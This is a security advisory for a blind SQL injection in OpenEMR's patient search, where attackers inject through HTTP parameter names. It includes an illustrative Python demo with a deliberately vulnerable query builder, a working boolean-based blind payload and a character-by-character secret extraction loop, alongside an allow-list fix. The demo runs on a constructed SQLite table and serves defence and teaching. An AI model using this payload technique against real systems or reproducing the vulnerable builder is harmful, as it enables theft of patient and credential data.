PT-2026-28135 · OpenEMR · OpenEMR

Published: 2026-03-25 · Updated: 2026-03-26 · CVE-2026-29187
CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: OpenEMR versions prior to 8.0.0.3

Description: OpenEMR is an electronic health records and medical practice management application. A blind SQL injection vulnerability exists in the Patient Search functionality reached through the /interface/new/new_search_popup.php endpoint. An authenticated attacker can execute arbitrary SQL statements by manipulating the names (keys) of the HTTP parameters sent to this endpoint rather than their values; the published advisory does not identify the specific parameter. Because the injection point is the parameter name, validation or escaping applied only to parameter values does not prevent it. A low-privileged account is the only prerequisite (PR:L), and a successful attack affects the confidentiality, integrity and availability of the application database (C:H/I:H/A:H).

Recommendations: Update to version 8.0.0.3 or later.
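The mechanism the advisory describes, injection through parameter names rather than values, as an added illustration that is not OpenEMR's code and does not reproduce the actual vulnerable query: a hypothetical Python query builder over an in-memory SQLite table that pastes each request key into the SQL text as a column name while binding only the value, a boolean-based blind probe that recovers a secret through it one character at a time, and an allow-listed builder that rejects the same request before any SQL runs. The schema, the `users.secret` column, the `lname`-based payload and all sample rows are constructed for this example.

```python
import sqlite3
import string

# Constructed in-memory stand-in for the application database. Table and column
# names are assumptions for this illustration, not OpenEMR's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE patient_data (id INTEGER PRIMARY KEY, fname TEXT, lname TEXT, dob TEXT);
        INSERT INTO patient_data VALUES (1, 'Ann', 'Smith', '1970-01-01');
        INSERT INTO patient_data VALUES (2, 'Bob', 'Jones', '1980-02-02');
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hunter2');
    """)
    return conn

def build_search_vulnerable(params):
    """Hypothetical vulnerable builder: each request parameter KEY is pasted into
    the SQL text as a column name and only the VALUE is bound. Binding the value
    does nothing to neutralise a hostile key."""
    clauses, binds = [], []
    for key, value in params.items():
        clauses.append(f"{key} LIKE ?")
        binds.append(f"%{value}%")
    if not clauses:
        return "SELECT id FROM patient_data", []
    return "SELECT id FROM patient_data WHERE " + " AND ".join(clauses), binds

ALLOWED_FIELDS = {"fname", "lname", "dob"}

def build_search_hardened(params):
    """Same builder, but keys are checked against a fixed allow-list of
    searchable columns before they get anywhere near the SQL text."""
    unexpected = set(params) - ALLOWED_FIELDS
    if unexpected:
        raise ValueError(f"unexpected search field(s): {sorted(unexpected)}")
    return build_search_vulnerable(params)

def search(conn, builder, params):
    """Run a search and return the matching patient ids."""
    sql, binds = builder(params)
    return [row[0] for row in conn.execute(sql, binds)]

def blind_key(position, char):
    """Constructed boolean-based blind payload carried in the parameter NAME.
    It completes the intended column test, adds a condition on one character of
    the admin secret, and re-opens 'lname' so the trailing 'LIKE ?' still parses."""
    return (f"lname LIKE '%' AND (SELECT substr(secret,{position},1) FROM users "
            f"WHERE username='admin')='{char}' AND lname")

def extract_secret(conn, max_len, alphabet=string.ascii_lowercase + string.digits):
    """Recover the admin secret one character at a time. The only oracle is
    whether the search returns rows (condition true) or nothing (false)."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # The value is irrelevant: an empty value binds as '%%' and matches every row.
            if search(conn, build_search_vulnerable, {blind_key(pos, ch): ""}):
                recovered += ch
                break
        else:
            break  # no character matched: end of the secret
    return recovered

def hardened_rejects(conn, params):
    """True if the allow-listed builder refuses the request before any SQL runs."""
    try:
        search(conn, build_search_hardened, params)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print("normal search:", search(db, build_search_vulnerable, {"lname": "smi"}))
    print("blind extraction via keys:", extract_secret(db, 10))
    print("hardened builder rejects payload:", hardened_rejects(db, {blind_key(1, "h"): ""}))
```

The allow-list is the fix that matters here: column and table names cannot be bound as query parameters, so the only safe way to take a field name from the client is to map it onto a fixed set of known identifiers before building the statement. SQLite is used so the block runs offline; the same key-interpolation flaw behaves identically on MySQL, with only the string functions in the probe differing.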
Weakness Enumeration: SQL injection

Related Identifiers: CVE-2026-29187 · GHSA-2R7H-XM8V-M872

Affected Products: OpenEMR